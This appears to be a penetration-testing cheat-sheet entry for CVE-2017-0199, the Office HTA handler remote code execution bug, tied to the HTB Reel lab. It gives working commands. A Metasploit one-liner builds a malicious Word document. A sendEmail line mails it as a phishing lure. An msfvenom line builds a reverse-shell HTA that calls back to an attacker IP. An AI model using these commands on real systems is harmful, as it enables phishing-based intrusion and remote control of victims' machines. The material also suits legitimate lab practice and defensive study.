HTA Handler RCE (CVE-2017-0199)
Overview #
- Attacker sends document with OLE to victim
- Victim clicks document (or download attachment from email)
- Document sends GET request to attacker IP to download a malicious HTA file. Once this file is downloaded, victim machine executes it due to logic bug of
mshta.exe
.
Exploits #
- CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler - Mandiant - using RTF and Word documnets
- CVE-2017-0199: New Malware Abuses PowerPoint Slides
Tools #
- Metasploit
# Generate document and run webserver
msfconsole -x "use windows/fileformat/office_word_hta; set srvhost tun0; set filename Procedures.doc; set lhost tun0; run"
# Send generated document to victim and wait for the reverse
# connection in metasploit
sendEmail -t nico@megabank.com -f hacker@kali.com -s reel:25 -u Procedures -o tls=no -a /home/kali/.msf4/local/Procedures.doc -m "See attachment for procedures"
Troubleshooting #
The python exploit in github didnt worked for me. When I tried to see in wireshark the network connections, I saw that victim did a GET
request to attacker, but attacker didnt respond back. Probably there is something wrong on http server implemention?
From other writeups, they didnt use the http server that comes up with the exploit kit but instead they used their own http server.
Alternatives #
- You can generate HTA file via this methods
# msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f hta-psh -o msfv.hta
# via nishang
https://www.youtube.com/watch?v=ob9SgtFm6_g&t=794s
References #
- HTB Reel
- CVE-2017-11826 Exploited in the Wild with Politically Themed RTF Document - maybe also related as this is an RTF exploit